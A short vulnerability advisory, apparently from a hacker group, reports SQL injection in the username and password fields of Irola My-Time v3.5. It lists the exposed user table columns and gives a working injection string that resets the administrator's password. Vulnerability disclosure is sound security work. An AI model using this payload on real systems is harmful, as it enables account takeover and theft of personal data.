Irola My-Time v3.5 SQL Injection

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Aria-Security Team http://Aria-Security.Net ----------------------------- Original Advisory (and more details) @ Irola My-Time v3.5 Username/Password Fields can run SQL Queries. Therefore: We get the Tables: UserInfo.UserID UserInfo.Login UserInfo.Password UserInfo.UserNumber UserInfo.FirstName UserInfo.LastName UserInfo.TeamID UserInfo.Address UserInfo.City UserInfo.ZipCode UserInfo.CountryID UserInfo.Phone Useful Injection: (changes admin's passwsord to hacked) -1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');-- MORE HELP AT the Original Page. Greetz: AurA Credits goes to Aria-Security Team Regards, The-0utl4w

